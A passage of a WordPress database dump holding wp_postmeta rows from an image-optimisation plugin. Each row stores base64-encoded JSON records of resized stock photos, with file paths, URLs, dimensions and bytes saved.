W50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjg2MSwidGltZSI6MTQ4MzU4MDQyMCwiaWQiOjg3M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDEzLCJ0aW1lIjoxNDgzNTgwNDIzLCJpZCI6ODczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0MTEsInRpbWUiOjE0ODM1ODA0MjcsImlkIjo4NzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjQ1MCwidGltZSI6MTQ4MzU4MDQzMCwiaWQiOjg3M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDY3LCJ0aW1lIjoxNDgzNTgwNDMzLCJpZCI6ODczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI0MDkyNTM2My00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNDA5MjUzNjMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjQwOTI1MzYzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo1MTEsInRpbWUiOjE0ODM1ODA0MzcsImlkIjo4NzN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29920, 872, 'wpfc_optimisation_reduction', '13279'); 
INSERT INTO `wp_postmeta` VALUES (29921, 872, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LmpwZyIsIndpZHRoIjo0MDY1LCJoZWlnaHQiOjI3MDAsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODA0NDIsImlkIjoiODcyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjYwMiwidGltZSI6MTQ4MzU4MDQ0NiwiaWQiOjg3Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktODAweDUzMS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktODAweDUzMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktODAweDUzMS5qcGciLCJyZWR1Y3Rpb24iOjEzNTcsInRpbWUiOjE0ODM1ODA0NTAsImlkIjo4NzJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTc2OHg1MTAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTc2OHg1MTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTc2OHg1MTAuanBnIiwicmVkdWN0aW9uIjoxMjQ2LCJ0aW1lIjoxNDgzNTgwNDU0LCJpZCI6ODcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0xNjAweDEwNjMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktMTYwMHgxMDYzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0xNjAweDEwNjMuanBnIiwicmVkdWN0aW9uIjo0NzI2LCJ0aW1lIjoxNDgzNTgwNDU5LCJpZCI6ODcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTIwLCJ0aW1lIjoxNDgzNTgwNDYyLCJpZCI6ODcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDY5LCJ0aW1lIjoxNDgzNTgwNDY1LCJpZCI6ODcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDg5LCJ0aW1lIjoxNDgzNTgwNDY5LCJpZCI6ODcyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6OTY3LCJ0aW1lIjoxNDgzNTgwNDcyLCJpZCI6ODcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MzYsInRpbWUiOjE0ODM1ODA0NzYsImlkIjo4NzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjUxOSwidGltZSI6MTQ4MzU4MDQ3OSwiaWQiOjg3Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja182MDA4NzEwOS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTc5LCJ0aW1lIjoxNDgzNTgwNDgzLCJpZCI6ODcyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzYwMDg3MTA5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2NjgsInRpbWUiOjE0ODM1ODA0ODYsImlkIjo4NzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfNjAwODcxMDktNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjcwMSwidGltZSI6MTQ4MzU4MDQ5MCwiaWQiOjg3Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (29922, 871, 'wpfc_optimisation_reduction', '13831'); 
INSERT INTO `wp_postmeta` VALUES (29923, 871, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LmpwZyIsIndpZHRoIjozMDcyLCJoZWlnaHQiOjIzMDQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODA0OTUsImlkIjoiODcxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY0NiwidGltZSI6MTQ4MzU4MDQ5OCwiaWQiOjg3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktODAweDYwMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktODAweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktODAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE0ODAsInRpbWUiOjE0ODM1ODA1MDMsImlkIjo4NzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTc2OHg1NzYuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTc2OHg1NzYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzE4NDE0OTQ5LTc2OHg1NzYuanBnIiwicmVkdWN0aW9uIjoxNDU0LCJ0aW1lIjoxNDgzNTgwNTA3LCJpZCI6ODcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xNjAweDEyMDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMTg0MTQ5NDktMTYwMHgxMjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0xNjAweDEyMDAuanBnIiwicmVkdWN0aW9uIjozNTg5LCJ0aW1lIjoxNDgzNTgwNTEyLCJpZCI6ODcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTk2LCJ0aW1lIjoxNDgzNTgwNTE2LCJpZCI6ODcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18xODQxNDk0OS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDh